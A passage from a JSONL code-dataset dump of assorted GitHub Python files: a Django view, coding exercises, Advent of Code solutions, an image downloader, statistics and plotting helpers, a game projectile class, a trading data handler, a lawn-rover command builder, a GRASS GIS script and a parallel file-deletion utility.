Bucket.objects.create(user_id=request.user.id, name=new_bucket_name)\n break\n else:\n new_bucket_name = new_bucket_name + '(' + str(i) + ')'\n\n return render(request, template_name, {'bucket': bucket, 'giftitemorder': giftitemorder})\n\n\n\n","repo_name":"UsenkoArtem/amis-1","sub_path":"students/km41/Tokar/GIFT_SHOPPING/gift_shopping/gifts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"30823599309","text":"customer = {\n \"name\": \"Kevin Liew\",\n \"age\": \"19\",\n \"is verified\": True\n}\n\ncustomer[\"birthdate\"] = \"22 September 2002\"\nprint(customer[\"birthdate\"])\n\n\nnumbers = {\n \"1\": \"One\",\n \"2\": \"Two\",\n \"3\": \"Three\",\n \"4\": \"Four\",\n \"5\": \"Five\", \n \"6\": \"Six\",\n \"7\": \"Seven\",\n \"8\": \"Eight\",\n \"9\": \"Nine\"\n}\n\nnumber = input(\"Phone: \")\noutput = \"\"\nfor ch in number:\n # If list doesn't have that value, we can make it use the ! by default instead\n # Create an output string\n output += numbers.get(ch, \"!\") + \" \"\n\nprint(output)\n","repo_name":"Kiwibeing/Lessons","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23484251904","text":"import numpy as np\n\ndef load():\n template = {}\n with open(\"../file.txt\", 'r') as file:\n for line in file:\n pair = line.strip().split(\" -> \")\n template[pair[0]] = pair[1]\n return template\n\ndef dicCount(total):\n occurrences = {}\n for x in total:\n if x in occurrences:\n occurrences[x] += 1\n if x not in occurrences:\n occurrences[x] = 1\n key_max = max(occurrences.values())\n key_min = min(occurrences.values())\n return key_max, key_min\n\ndef runSequence(template):\n initial = ['B','N','S','O','S','B','B','K','P','C','S','C','P','K','P','O','P','N','N','K']\n for i in range(6):\n print(f\"day {i}\")\n new = []\n for x in range(0, len(initial)-1):\n new.append(initial[x])\n new.append(template[f\"{initial[x]}{initial[x+1]}\"])\n new.append(initial[x+1])\n initial = new\n return new\n\ndef main():\n template = load()\n total = runSequence(template)\n print(len(total))\n max_v, min_v = dicCount(total)\n print(max_v - min_v) \nif __name__ == \"__main__\":\n main() ","repo_name":"BrunoGrifo/codeAdvent2021","sub_path":"day14/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20864942413","text":"# get_heros.py\n# 引入模块 \nimport requests \nimport json \nimport os\nimport time\n \nst = time.time() #程序开始时间\nurl = 'http://pvp.qq.com/web201605/js/herolist.json'\nresponse=requests.get(url).content\n \n# 提取Json信息\njsonData=json.loads(response) \nprint(jsonData)\n\n# 初始化下载数量 \nx = 0 \n \n#目录不存在则创建 \nhero_dir='/Users/mm/python/python-examples/heros/imgs/' \nif not os.path.exists(hero_dir):\n os.mkdir(hero_dir)\n \nfor m in range(len(jsonData)):\n # 英雄编号 \n ename = jsonData[m]['ename'] \n # 英雄名称 \n cname = jsonData[m]['cname'] \n # 皮肤名称,一般英雄会有多个皮肤 \n skinName = jsonData[m]['skin_name'].split('|') \n # 皮肤数量 \n skinNumber = len(skinName)\n \n # 循环遍历处理\n for bigskin in range(1,skinNumber+1):\n # 拼接下载图片url\n picUrl = 'http://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/'+str(ename)+'/'+str(ename)+'-bigskin-'+str(bigskin)+'.jpg'\n #获取图片内容 \n picture = requests.get(picUrl).content \n # 保存图片 \n with open( hero_dir + cname + \"-\" + skinName[bigskin-1]+'.jpg','wb') as f:\n f.write(picture)\n x=x+1\n print(\"当前下载第\"+str(x)+\"张皮肤\") \n# 获取结束时间 \nend = time.time()\n# 计算执行时间\nexec_time = end-st \nprint(\"找到并下载\"+str(x)+\"张图片,总共用时\"+str(exec_time)+\"秒。\")\n","repo_name":"zhuby1973/map","sub_path":"jiguang/heros/get_heros.py","file_name":"get_heros.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19660739608","text":"### ASSUMPTIONS ###\n\n# Ordinal Dependent Variable (binary) (Y) \n# Independent Observations (Y) \n# No multicollinearity (!!!) (X)\n# Data is suitable for log odds relationship (Y) \n\n## Import useful libraries\nimport pandas as pd\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom tqdm import tqdm\nimport numpy as np\n\n## Read in data\nfeedToModelData = pd.read_csv('feedToModelData.csv', index_col = 0)\nfeedToModelData.iloc[:,2:-1].corr().to_csv('correlationMatrix.csv')\n\n\n### The work here is designed to correct the multicollinearity assumption, \n### which is currently being violated \n\n## Define function to calculate Variable Inflation Factor\ndef calc_vif(X):\n # Calculating VIF\n vif = pd.DataFrame()\n vif[\"variables\"] = X.columns\n vif[\"VIF\"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]\n\n return(vif)\n\nfor i in tqdm(range(1, 751)): \n try: \n ## Run function to produce VIFs\n X = feedToModelData.iloc[:i,2:-1]\n calc_vif(X)\n\n except: \n print('error')\n feedToModelData = feedToModelData.drop(i - 1)\n\nval = 1000000\ni = 0\n\nfeedToModelDataLoop = feedToModelData\nfeedToModelDataLoop = feedToModelDataLoop.loc[:, feedToModelDataLoop.columns != 'Team1Win']\nwhile val > 100: \n i += 1\n dfSource = calc_vif(feedToModelDataLoop)\n dfSource = dfSource[~dfSource.isin([np.nan, np.inf, -np.inf]).any(1)]\n VIFDF = pd.DataFrame(dfSource)\n VIFDF = VIFDF.sort_values(by = 'VIF', ascending = False).reset_index(drop = True)\n \n \n val = VIFDF.iloc[0]['VIF']\n \n VIFDF = VIFDF.iloc[1:]\n \n variables = list(VIFDF['variables'])\n \n feedToModelDataLoop = feedToModelDataLoop[variables]\n\nvariables = variables + ['Team1Win']\nfeedToModelData = feedToModelData[variables]\n\n### We now meet the assumption for multicollinearity\n\n# feedToModelData.to_csv('feedToModelData2.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aks5bx/NCAA_Model_Comparisons","sub_path":"assumptionsCheck.py","file_name":"assumptionsCheck.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30707934769","text":"# Pet Shop OOP Assingment\n\n# Shannon Murray\n# J.R. Smith\n# Alex Bennett\n# Miller Hardy\n\n# This program prompts the user to enter the number of cusotmers for the \"Critter Watch\" Pet Boarding company.\n# Data on each customer, their pet, and their pet's appointment is recorded, and a bill statement is printed.\n# The user can then specify a payment, and an updated bill statement is printed for the current customer.\n\nfrom datetime import datetime\n\n#Cusotmer class\nclass Customer :\n\n # Class variable\n company_name = \"Critter Watch\"\n\n # Constructor - receives parameters from user to assign to attributes\n def __init__(self, fName, lName, cusAddress1, cusAddress2, cusCity, cusState, cusZip) :\n self.first_name = fName\n self.last_name = lName\n self.address1 = cusAddress1\n # calculates cust_id by calling the gen_id method; passes parameters with leading/trailing spaces removed\n self.cust_id = self.gen_id(self.first_name.strip(), self.last_name.strip(), self.address1.strip())\n self.address2 = cusAddress2\n self.city = cusCity\n self.state = cusState\n self.zip = cusZip\n self.balance = 0.0\n # cust_pet intended to hold a list Pet object\n self.cust_pet = []\n\n # generates customer id using the first 3 letters from first and last name, and the first 5 letters of the address\n def gen_id(self, fName, lName, firstAddress) :\n newCusID = fName[0:3] + lName[0:3] + firstAddress[0:5]\n # Replace any spaces in the string with no space ('')\n newCusID = newCusID.replace(\" \", \"\")\n return(newCusID)\n\n # Return summary statement for the customer pet appointment bill\n def return_bill(self) : \n return(\"Customer \" + self.cust_id + \" with name \" + self.first_name + \" \" + self.last_name + \" owes $\" + \\\n str(self.balance) + \" for \" + self.cust_pet[len(self.cust_pet) - 1].pet_name + \"'s stay from \" + \\\n str(self.cust_pet[len(self.cust_pet) - 1].appointment[len(self.cust_pet[len(self.cust_pet) - 1].appointment) - 1].begin_date.strftime(\"%m/%d/%Y\")) + \" to \" + \\\n str(self.cust_pet[len(self.cust_pet) - 1].appointment[len(self.cust_pet[len(self.cust_pet) - 1].appointment) - 1].end_date.strftime(\"%m/%d/%Y\")))\n\n # receives payment from the user and updates the customer balance\n def make_payment(self, fPayment) :\n self.balance = round(self.balance - fPayment, 2)\n\n# Pet class:\nclass Pet() :\n # Instance Variables:\n def __init__(self, petName, sBreed, iAge, oOwner) :\n self.pet_name = petName\n self.breed = sBreed\n self.age = iAge\n self.owner = oOwner\n self.appointment = []\n # creates new appointment object \n self.appointment.append(Appointment(self.owner))\n\n# Appointment class:\nclass Appointment() :\n\n # constructor\n def __init__(self, oOwner) :\n self.owner = oOwner\n\n # receives parameters from the user and stores them to attributes\n def set_appointment(self, beginDate, endDate, dayRate) :\n self.begin_date = beginDate\n self.end_date = endDate\n self.day_rate = dayRate\n # calls the calc_days() method to generate additional attributes\n self.calc_days()\n # add cost to customer balance\n self.owner.balance = self.total_cost\n\n # determines how many days the appointment lasted and the total cost of the appointment\n def calc_days(self) :\n self.total_days = (self.end_date - self.begin_date).days\n # If the appointment began and ended on the same day, count it as 1 day\n if(self.total_days <= 0) :\n self.total_days = 1\n self.total_cost = self.total_days * self.day_rate\n \n\n# collect customer, pet, and appointment information for each customer \n# determine number of customers\nnumCustomers = int(input(\"Enter number of customers to enter: \"))\n\n# collect information for each Customer\nfor iCount in range (0, numCustomers) :\n\n # collect customer information\n print(\"\\nInformation for customer number \" + str(iCount + 1))\n fName = input(\"\\nEnter first name: \")\n lName = input(\"Enter last name: \")\n cusAddress1 = input(\"Enter first address: \")\n cusAddress2 = input(\"Enter second address: \")\n cusCity = input(\"Enter city: \")\n cusState = input(\"Enter state: \")\n cusZip = input(\"Enter zip code: \")\n\n oCustomer = Customer(fName, lName, cusAddress1, cusAddress2, cusCity, cusState, cusZip)\n\n # determine number of pets for current customer\n petCount = int(input(\"\\nEnter number of pets: \"))\n\n # collect pet information for each pet by iterating through the list\n for jCount in range (0, petCount) :\n print(\"\\nInformation for pet number \" + str(jCount + 1))\n petName = input(\"\\nEnter pet's name: \")\n petBreed = input(\"Enter pet's breed: \")\n petAge = int(input(\"Enter pet's age: \"))\n\n # creates new pet object and appends to customer list\n oCustomer.cust_pet.append(Pet(petName, petBreed, petAge, oCustomer))\n\n # determine number of appointments for current pet\n appointCount = int(input(\"\\nEnter number of appointments for \" + oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].pet_name + \": \"))\n\n # collect appointment information for each appointment by iterating through the list\n for kCount in range (0, appointCount) :\n print(\"\\nInformation for appointment number \" + str(kCount + 1))\n beginDate = datetime.strptime(input(\"\\nEnter the appointment start date in the format m/d/y: \"), \"%m/%d/%Y\").date()\n endDate = datetime.strptime(input(\"Enter end appointment end date in the format m/d/y: \"), \"%m/%d/%Y\").date()\n dayRate = float(input(\"Enter the rate per day: \"))\n print(\"\\n\")\n\n oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].appointment[len(oCustomer.cust_pet[len(oCustomer.cust_pet) - 1].appointment) - 1].set_appointment(beginDate, endDate, dayRate)\n print(oCustomer.return_bill())\n\n payment = float(input(\"Enter a payment amount: \"))\n oCustomer.make_payment(payment)\n\n print(oCustomer.return_bill())\n print(\"\\n\")\n","repo_name":"Mhardy99/OOP_Group_Assignment","sub_path":"OOPGroup.py","file_name":"OOPGroup.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74083781802","text":"from panda3d.core import Point3, Vec3, NodePath, ModelRoot\n\nfrom direct.distributed.DistributedSmoothNode import DistributedSmoothNode\n\nfrom src.coginvasion.phys.PhysicsNodePath import BasePhysicsObject\nfrom src.coginvasion.base.Precache import Precacheable, precacheModel, precacheSound\nfrom src.coginvasion.attack.BaseProjectileShared import BaseProjectileShared\n\nclass BaseProjectile(DistributedSmoothNode, BaseProjectileShared, BasePhysicsObject, Precacheable):\n \"\"\"\n A projectile.\n This impl just renders the projectile model at the positions reported by the server.\n \"\"\"\n\n ModelPath = None\n ModelOrigin = Point3(0, 0, 0)\n ModelAngles = Vec3(0, 0, 0)\n ModelScale = Vec3(1, 1, 1)\n\n ImpactSoundPath = None\n\n def __init__(self, cr):\n DistributedSmoothNode.__init__(self, cr)\n BaseProjectileShared.__init__(self)\n BasePhysicsObject.__init__(self)\n NodePath.__init__(self, ModelRoot(\"BaseProjectile\"))\n\n self.model = None\n self.impactSound = None\n\n def impact(self, pos, lastPos):\n pass\n\n @classmethod\n def doPrecache(cls):\n if cls.ModelPath:\n precacheModel(cls.ModelPath)\n if cls.ImpactSoundPath:\n precacheSound(cls.ImpactSoundPath)\n\n def wantsSmoothing(self):\n return 0\n\n def disable(self):\n self.stopWaterCheck()\n self.cleanupPhysics()\n if self.model:\n self.model.removeNode()\n self.model = None\n self.impactSound = None\n BaseProjectileShared.cleanup(self)\n DistributedSmoothNode.disable(self)\n\n def announceGenerate(self):\n DistributedSmoothNode.announceGenerate(self)\n self.stopSmooth()\n if self.ImpactSoundPath:\n self.impactSound = base.audio3d.loadSfx(self.ImpactSoundPath)\n if self.ModelPath:\n self.model = loader.loadModel(self.ModelPath)\n self.model.reparentTo(self)\n self.model.setPos(self.ModelOrigin)\n self.model.setHpr(self.ModelAngles)\n self.model.setScale(self.ModelScale)\n self.reparentTo(render)\n self.onSpawn()\n self.startWaterCheck()\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/attack/BaseProjectile.py","file_name":"BaseProjectile.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"28924838672","text":"from pandas import Series, DataFrame\nimport config\nimport event\nimport analysis as an\nimport mysql.connector\nfrom datetime import datetime, timedelta\nfrom dateutil.rrule import rrule, HOURLY, SECONDLY\n\n# Needs changing for DST\n\nclass DataHandler:\n # Pull and return latest rate (with Dataframe of N previous bars)\n # Add error check for time on df vs current time\n def get_latest_rate(self, ticker, granularity='M10', n=10):\n time = datetime.utcnow() + timedelta(hours = 1)\n df = an.average_dataframe(an.selectlast(ticker, granularity, datetime.utcnow() + timedelta(hours = 1), n))\n ev = event.Event('tick', time)\n ev.ticker = ticker\n ev.price = an.get_current_rate(ticker)\n ev.df = df\n ev.spread = an.get_spread(ticker)\n return ev\n\n\nclass HistoricalDataHandler:\n \n #Initialise row variable for iteration through dataframe\n def __init__(self, ticker, granularity, start, end):\n self.ticker = ticker\n self.granularity = granularity\n self.start = start\n self.end = end\n self.get_data()\n self.ohlc_dict = {'open':'first', 'high':'max', 'low':'min', 'close': 'last'}\n\n\n # Load handler with historical data - change to take granularity as input\n def get_data(self):\n df = an.average_dataframe(an.selectdates(self.ticker, self.granularity, self.start - timedelta(hours = 100), self.end))\n df_full = an.dataframe(an.selectdates(self.ticker, self.granularity, self.start - timedelta(hours = 100), self.end))\n self.lastrow = df.loc[df['time'] == self.start].index[0]\n self.df = df.set_index('time')\n self.df_full = df_full.set_index('time')\n\n\n def push_next_ma_bar_1h(self, gap=1300):\n ev = event.Event('tick', self.df.index[self.lastrow])\n ev.df = self.df[self.lastrow - gap:self.lastrow].resample('1H', how=self.ohlc_dict).dropna(how='any')\n ev.ticker = self.ticker\n ev.price = {'ask': self.df_full.iloc[self.lastrow]['closeAsk'], 'bid': self.df_full.iloc[self.lastrow]['closeBid']}\n ev.spread = round(an.pip_difference(self.df_full.iloc[self.lastrow]['closeAsk'], self.df_full.iloc[self.lastrow]['closeBid']), 1)\n self.lastrow += 1\n return ev\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yml980322037/Oanda","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71389878442","text":"import sort #imports merge sort and bubbledes\nimport ordsearch\nimport dup #imports count_dupes_per_file, merge_dupes_file\nimport util\n\ndef make_table(pairs):\n ref = count_files_words(pairs) #make a table which keeps in track the number of wrods in each file\n result1 = sort.merge_pairs(pairs) #merge sort the pairs\n result2 = dup.count_dupes_per_file(result1) #count the number of duplicates for each word in each file\n result3 = dup.merge_dupes_file(result2) #make a list for each word listing all the files they occur in\n for i in range(0,len(result3)): #calculates the frequency density for each word in each file using the list created above\n result3[i][1] = calculate_density(result3[i][1], ref) #carries out the function above for each i-th word\n result3 = make_des(result3) #makes it descending order\n return result3 #gives back the result\n\ndef count_files_words(pairs):\n ref = [] #makes an empty list to keep track of number of words for each file\n fileindex = 0\n fresh = pairs[0] #sets the file name as fresh, the first encountered file name is always the one that has not yet been repeated ie fresh\n ref.append([fresh[1], 1]) #keeps track of file name and number of wrods as a pair, [\"filename\", no. of words]\n for i in range(0,len(pairs)):\n if pairs[i][1] == fresh[1]: #if the filename in pairs is same as fresh,\n ref[fileindex][1] += 1 #increment counter of the number of words\n else: #new file name has been encountred\n fileindex += 1 #ref index is incremented for the new filename\n fresh = pairs[i] #make the pair filename fresh and repeat as for the first fresh element\n ref.append([fresh[1], 1])\n return ref #give back the data\n\ndef calculate_density(pairs, ref):\n for i in range(0,len(pairs)): #do the below for all list that was input for a specific word\n found = False #flag for if the file name is found in the ref array for the corresponding filename in the pair input\n j = 0\n value = 1\n while not(found) and j= sum_amt:\n curr_sum -= measurements[v - sum_amt]\n all_sums.append(curr_sum)\n\nall_sums = all_sums[sum_amt - 1:]\ntotal = 0\nfor i in range(len(all_sums) - 1):\n total += all_sums[i] < all_sums[i + 1]\nprint(f\"bruh i spent way too long figuring out what that A, B, C... meant: {total}\")\n","repo_name":"SansPapyrus683/advent-of-code","sub_path":"y2021/day1/sleigh_bells.py","file_name":"sleigh_bells.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"31509457850","text":"import logging\nlogger = logging.getLogger(__name__)\n\nimport numpy as np\nimport pandas as pd\n\nfrom .. data.mapdata import current_map\nfrom .. data.roverdata import robot\nfrom .. data.cfgdata import rovercfg\nfrom . import cmdlist\n\ndef takemap(perimeter: pd.DataFrame(), way: pd.DataFrame(), dock: bool) -> pd.DataFrame():\n perimeter = perimeter[perimeter['type'] != 'search wire']\n logger.info('Backend: Prepare map and way data for transmition')\n\n #Remove dockpoints, if neccessary (e.g. for goto command)\n if not dock:\n perimeter = perimeter[perimeter['type'] != 'dockpoints']\n\n data = pd.concat([perimeter, way], ignore_index=True)\n \n data = data.round(2)\n #Create AT+W messages\n amount_of_packages = data.index//30\n data['package_nr'] = amount_of_packages\n data['coords'] = ','+data['X'].astype(str)+','+data['Y'].astype(str) \n data = data.groupby('package_nr').agg({'coords': lambda x: list(x)})\n buffer = pd.DataFrame()\n for i, row in data.iterrows():\n buffer_str = ''.join(row['coords'])\n msg = {'msg': 'AT+W,'+str(i*30)+buffer_str}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n logger.debug('Add to takemap buffer: '+str(msg))\n\n #Create AT+N message\n perimeter_cnt = len(perimeter[perimeter['type'] == 'perimeter'])\n exclusion_names = perimeter['type'].unique()\n exclusion_names = np.delete(exclusion_names, np.where(exclusion_names == 'perimeter'))\n exclusion_names = np.delete(exclusion_names, np.where(exclusion_names == 'dockpoints'))\n exclusions_cnt = len(perimeter[perimeter['type'].isin(exclusion_names)])\n docking_cnt = len(perimeter[perimeter['type'] == 'dockpoints'])\n if way.empty:\n way_cnt = 0\n else:\n way_cnt = len(way[way['type'] == 'way'])\n msg = {'msg': 'AT+N,'+str(perimeter_cnt)+','+str(exclusions_cnt)+','+str(docking_cnt)+','+str(way_cnt)+',0'}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n\n #Create AT+X message\n exclusion_pts = []\n for exclusion in exclusion_names:\n exclusion_pts.append(len(perimeter[perimeter['type'] == exclusion]))\n exclusion_pts = str(exclusion_pts)\n exclusion_pts = exclusion_pts.replace('[', '')\n exclusion_pts = exclusion_pts.replace(']', '')\n exclusion_pts = exclusion_pts.replace(' ', '')\n msg = {'msg': 'AT+X,0,'+exclusion_pts}\n msg_df = pd.DataFrame([msg])\n buffer = pd.concat([buffer, msg_df], ignore_index=True)\n\n return buffer\n\ndef move(movement: list()) -> pd.DataFrame():\n if movement[0] !=0 or movement[1] != 0:\n msg = {'msg': 'AT+M,'+str(movement[0])+','+str(movement[1])}\n buffer = pd.DataFrame([msg])\n logger.debug(f'Backend: Command \"MOVE\" is prepared. X:{movement[0]} Y:{movement[1]}')\n return buffer\n elif movement[0] == 0 and movement[1] == 0:\n msg = {'msg': 'AT+M,0.0,0.0'}\n buffer = pd.DataFrame([msg])\n logger.debug(f'Backend: Command \"MOVE\" is prepared. X:{movement[0]} Y:{movement[1]}')\n cmdlist.cmd_move = False\n return buffer\n\ndef goto() -> pd.DataFrame():\n msg = {'msg': 'AT+C,0,1,'+str(rovercfg.gotospeed_setpoint)+',100,0,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command goto is prepared')\n cmdlist.cmd_goto = False\n return buffer\n\ndef stop():\n msg = {'msg': 'AT+C,0,0,-1,-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command stop is prepared')\n cmdlist.cmd_stop = False\n return buffer\n\ndef dock() -> pd.DataFrame():\n msg = {'msg': 'AT+C,0,4,-1,-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command dock is prepared')\n cmdlist.cmd_dock = False\n return buffer\n\ndef mow() -> pd.DataFrame():\n msg = {'msg': 'AT+C,1,1,'+str(rovercfg.mowspeed_setpoint)+',-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command start is prepared')\n cmdlist.cmd_mow = False\n return buffer\n\ndef shutdown() -> pd.DataFrame():\n msg = {'msg': 'AT+Y3'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command shutdown is preapred')\n cmdlist.cmd_shutdown = False\n return buffer\n\ndef reboot() -> pd.DataFrame():\n msg = {'msg': 'AT+Y'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command reboot is prepared')\n cmdlist.cmd_reboot = False\n return buffer\n\ndef gpsreboot() -> pd.DataFrame():\n msg = {'msg': 'AT+Y2'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command GPS reboot is prepared')\n cmdlist.cmd_gps_reboot = False\n return buffer\n\ndef togglemowmotor() -> pd.DataFrame():\n #mow motor switch on\n if not robot.last_mow_status:\n msg = {'msg': 'AT+C,1,-1,-1,-1,-1,-1,-1,-1'}\n cmdlist.cmd_toggle_mow_motor = False\n #mow motor switch off\n else:\n msg = {'msg': 'AT+C,0,-1,-1,-1,-1,-1,-1,-1'}\n cmdlist.cmd_toggle_mow_motor = False\n buffer = pd.DataFrame([msg])\n return buffer\n\ndef takepositionmode() -> pd.DataFrame():\n positionmode = rovercfg.positionmode\n if positionmode == 'absolute':\n positionmode = '1,'\n else:\n positionmode = '0,'\n msg = {'msg': 'AT+P,'+positionmode+str(rovercfg.lon)+','+str(rovercfg.lat)}\n buffer = pd.DataFrame([msg])\n cmdlist.cmd_set_positionmode = False\n return buffer\n\ndef changespeed(new_speed: float) -> pd.DataFrame():\n msg = {'msg': 'AT+C,-1,-1,'+str(new_speed)+',-1,-1,-1,-1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Command change speed is prepared, new value is: '+str(new_speed))\n cmdlist.cmd_changemowspeed = False\n cmdlist.cmd_changegotospeed = False\n return buffer\n\ndef skipnextpoint() -> pd.DataFrame():\n msg = {'msg': 'AT+C,-1,-1,-1,-1,-1,-1,1,-1'}\n buffer = pd.DataFrame([msg])\n logger.debug('Command skip next point is prepared')\n cmdlist.cmd_skipnextpoint = False\n return buffer\n\ndef custom() -> pd.DataFrame():\n msg = {'msg': cmdlist.cmd_custom_str}\n buffer = pd.DataFrame([msg])\n logger.debug('Backend: Custom command is prepared')\n cmdlist.cmd_custom = False\n cmdlist.cmd_custom_str = ''\n return buffer","repo_name":"EinEinfach/CaSSAndRA","sub_path":"CaSSAndRA/src/backend/comm/cmdtorover.py","file_name":"cmdtorover.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"38179275187","text":"from grass.script import core as gcore\n\n\ndef main():\n options, flags = gcore.parser()\n gisenv = gcore.gisenv()\n if \"MONITOR\" in gisenv:\n cmd_file = gcore.parse_command(\"d.mon\", flags=\"g\")[\"cmd\"]\n d_cmd = \"d.to.rast\"\n for param, val in options.items():\n if val:\n d_cmd += \" {param}={val}\".format(param=param, val=val)\n if gcore.overwrite():\n d_cmd += \" --overwrite\"\n with open(cmd_file, \"a\") as file_:\n file_.write(d_cmd)\n else:\n gcore.fatal(\n _(\"No graphics device selected. Use d.mon to select graphics device.\")\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OSGeo/grass","sub_path":"scripts/d.to.rast/d.to.rast.py","file_name":"d.to.rast.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"17925899426","text":"\"\"\" delete dirs and files in parallel \"\"\"\n\nimport functools\nimport glob\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import List\n\nfrom parallel_traversal import parallel_recursive_apply\n\n\ndef force_delete(path: Path, _, is_dir: bool) -> None:\n \"\"\" delete file or dir even if it is read-only \"\"\"\n try:\n if is_dir:\n path.rmdir()\n else:\n path.unlink()\n except PermissionError:\n pass\n else:\n return\n\n # try again after unsetting read-only flag\n try:\n if sys.platform == 'win32':\n os.chmod(path, 0o777)\n else:\n os.chmod(path, 0o777, follow_symlinks=False)\n if is_dir:\n path.rmdir()\n else:\n path.unlink()\n except PermissionError:\n # try finding locking process and its parent processes to inform user\n import psutil\n for proc in psutil.process_iter():\n try:\n if path in proc.open_files():\n break\n except psutil.NoSuchProcess:\n pass\n else:\n proc = None\n if proc is not None:\n print(f\"Failed to delete {path!r} because it is locked by \"\n f\"process {proc.name()} (pid={proc.pid}).\")\n print(\"Parent processes:\")\n for i, parent in enumerate(proc.parents()):\n print(f\"{' ' * i}`- {parent.name()} \"\n f\"({parent.pid})\")\n # reraise anyway\n raise\n\n\ndef parallel_rm_r(paths: List[str], num_max_threads: int = 512) -> None:\n \"\"\" delete dirs and files in parallel \"\"\"\n parallel_recursive_apply(\n paths,\n dir_func=functools.partial(force_delete, is_dir=True), # type: ignore\n file_func=functools.partial(force_delete, is_dir=False), # type: ignore\n pre_order=False,\n num_max_threads=num_max_threads)\n\n\ndef main() -> None:\n \"\"\" main function \"\"\"\n if len(sys.argv) < 2:\n print(\"Usage: python parallel_rm_r.py \"\n \" ...\")\n print(\" You can use wildcards * and ? to specify multiple \"\n \"files/directories.\")\n sys.exit(1)\n\n # get paths from command line arguments\n paths = []\n for pattern in sys.argv[1:]:\n if sys.version_info >= (3, 11):\n matches = glob.glob(pattern, recursive=True, include_hidden=True)\n else:\n matches = glob.glob(pattern, recursive=True)\n if not matches:\n # if pattern does not match anything, skip it\n print(f\"Warning: Skipped {pattern}: Does not match \"\n \"any file or directory.\")\n paths.extend(matches)\n\n # delete dirs and files in parallel\n parallel_rm_r(paths)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cosine0/parallel_files","sub_path":"parallel_rm_r.py","file_name":"parallel_rm_r.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23391479183","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom matplotlib.patches import Ellipse\n\n\ndef plot_2d_contours(f, xlim, ylim,\n n_steps=200, n_contour=25,\n ax=None, **kwargs):\n x = np.linspace(xlim[0], xlim[1], n_steps)\n y = np.linspace(ylim[0], ylim[1], n_steps)\n grid = np.dstack(np.meshgrid(x, y))\n\n # Flatten out the grid to a simple list of co-ordinate points, this is\n # sometimes acceptable when a 3-d array input is not.\n coords_vec = grid.reshape(grid.shape[0]*grid.shape[1],-1)\n values_vec = f(coords_vec)\n # Reshape the output back into a grid:\n values_grid = values_vec.reshape(grid.shape[0],grid.shape[1])\n\n if ax is None:\n ax = plt.gca()\n contourset = ax.contourf(x, y, values_grid, n_contour, **kwargs)\n return contourset, ax\n\ndef get_2d_confidence_ellipse(mvgauss, confidence=0.95):\n \"\"\"\n Calculate the ellipse containing given proportion of probability mass. \n \n Args:\n mvgauss (MvGauss): (2-d) Multivariate Gaussian to use.\n confidence (float): Value from 0 to 1. If confidence=0.95, 95% of \n samples will fall within this ellipse. \n \n Returns:\n matplotlib.patches.Ellipse: The ellipse bounding the confidence region.\n \"\"\"\n # A useful refererence:\n # http://www.visiondummy.com/2014/04/draw-error-ellipse-representing-covariance-matrix/\n if len(mvgauss.mu)!=2:\n raise ValueError(\"Can only get confidence ellipse for 2-d Gaussian.\")\n # Might implement ellipsoids / projections at some point in the future\n # Invert the CDF at ``confidence`` to get the chisq value.\n chisq = scipy.stats.chi2(df=2).ppf(confidence)\n # print(\"PPF Chisq:\", chisq)\n # chisq = scipy.stats.chi2(df=2).isf(1. - confidence)\n # print(\"ISF Chisq:\", chisq)\n chi = chisq**0.5\n 